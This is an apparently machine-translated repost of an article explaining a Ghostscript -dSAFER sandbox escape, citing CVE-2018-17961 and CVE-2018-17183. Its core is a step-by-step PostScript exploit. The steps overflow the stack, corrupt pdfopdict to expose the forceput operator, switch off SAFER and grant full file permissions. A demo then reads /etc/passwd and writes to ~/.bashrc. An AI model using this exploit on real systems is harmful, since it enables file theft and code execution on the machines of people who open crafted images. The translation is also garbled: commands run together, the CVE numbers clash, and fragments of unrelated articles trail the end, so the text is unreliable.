In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article will explain in detail how the dSAFER sandboxie escape technology based on vulnerability CVE-2018-17961 is. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.
Preface
What I am going to analyze for you today is a new type of ghostscript-dSAFER sandboxie escape technology, which is still applicable to all ghostscript versions currently in use. I don't know how long this loophole has existed, but I think it's been a long time.
The exploit code provided below works well in the latest versions, and you need to add a line to ~ / .bashrc if you want to view the code in evince, imagemagick, gimp, or okular. Because nautilus will automatically call evice-thumbnailer without any user interaction. If you want to trigger this vulnerability, you just need to visit any website after running the exploit code.
Taviso@ubuntu:~$convert exploit.jpg output.jpgtaviso@ubuntu:~$tail-1 ~ / .bashrcechopwned by postscript background content
One of the core access control functions of Postscript is that it can mark the running process of executable code, which can prevent users from peeping into the execution of system programs and gain more powerful access rights. To this end, I specially designed a complete vulnerability exploitation code, interested students can download the test [download address].
When you install an error processor in errordict, if you terminate an ongoing operation process, the error operator will be exposed to the error processor. At this point, rrorerdict ignores the-dSAFER sandbox, which is the vulnerability CVE-2018-17183 exploited in this article.
Exploit details
It is important to note that this vulnerability has not been fully fixed, because you can still call the error handler and trigger the error, or access the error handler saved by the internal state.
One way to exploit the vulnerability is to find an execution process that can terminate the execution, trigger an exception, and then call the error handler and terminate its operation (which can be done through / stackoverflow or / execoverflow). When a failure occurs, the opcode stack will be in an inconsistent state because ghostscript tries to set the wrong processor, but this setting is invalid.
Vulnerability exploitation mode
First, fill the stack with junk data, leaving only a small portion of the space for the error processor:
GS > 01 300368 {} for
Then make the / switch_to_normal_marking_ops error by modifying the pdfopdict (to a non-dictionary form):
GS/pdfopdict null def
Call / switch_to_normal_marking_ops (currently in execution):
GSGS_PDF_ProcSet/switch_to_normal_marking_ops get stopped
The operation will fail because / typecheck is writing to pdfopdict:
GS==True
Look at the last few elements in the saved stack:
GSdupdup length 10 sub 10 getinterval = = [300364300365 300366 300367 300368 null / m {normal_m}-.forceput-/ typecheck]
As you can see, the error operator is ready to be passed to the error processor.
Where forceput is a very powerful operator that ignores all access controls, we can extract it from the stack and use it to do what we want to do:
Systemdict/SAFER false forceputsystemdict/userparams get / PermitFileControl [(*)] forceputsystemdict/userparams get / PermitFileWriting [(*)] forceputsystemdict/userparams get / PermitFileReading [(*)] forceput
Combined with the previous introduction, let's take a look at how to read the data in / etc/passwd. Here is a copy of the DEMO:
Gs-dSAFER-f test.psGPLGhostscript GIT PRERELEASE 9.26 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. Allrights reserved.Thissoftware comes with NO WARRANTY: see the file PUBLIC for details. (root:x:0:0:root:/root:/bin/bash) this is how the dSAFER sandboxie escape technology based on vulnerability CVE-2018-17961 is shared here. I hope the above content can be helpful to everyone and learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.